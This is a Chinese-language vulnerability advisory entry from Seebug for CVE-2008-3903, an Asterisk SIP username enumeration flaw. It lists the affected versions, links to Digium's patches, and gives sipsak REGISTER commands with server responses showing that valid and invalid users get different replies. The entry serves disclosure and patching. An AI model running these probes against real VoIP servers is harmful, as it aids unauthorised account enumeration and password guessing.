Lucene search

K
seebugRootSSV:4993
HistoryApr 04, 2009 - 12:00 a.m.

Asterisk认证SIP响应用户名枚举漏洞

2009-04-0400:00:00
Root
www.seebug.org
17

EPSS

0.006

Percentile

78.5%

BUGTRAQ ID: 34353
CVE(CAN) ID: CVE-2008-3903

Asterisk是开放源码的软件PBX,支持各种VoIP协议和设备。

如果启用了Digest认证的话,Asterisk PBX对登录期间所尝试的有效和无效SIP用户名会返回不同的响应,远程攻击者可以通过暴力猜测枚举出有效的用户名。

Asterisk Asterisk 1.6.0.x
Asterisk Asterisk 1.4.x
Asterisk Asterisk 1.2.x
Asterisk Business Edition C.2.x.x
Asterisk Business Edition C.1.x.x
Asterisk Business Edition B.x.x
Asterisk s800i 1.3.x
Asterisk

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt</a>


                                                在启用了alwaysauthreject的Asterisk 1.4上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:[email protected]:5060;tag=550fcb06
To: sip:[email protected]:5060;tag=as49ef5a0f
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm=”asterisk”, nonce=”70f69171″
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:[email protected]:5060;tag=4e3b4edd
To: sip:[email protected]:5060;tag=as305009f4
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

在禁用了alwaysauthreject的Asterisk上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:[email protected]:5060;tag=5596ae2f
To: sip:[email protected]:5060;tag=as5620a72f
Call-ID: [email protected]
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:[email protected]:5060;tag=55aaf11b
To: sip:[email protected]:5060;tag=as4e3f230d
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0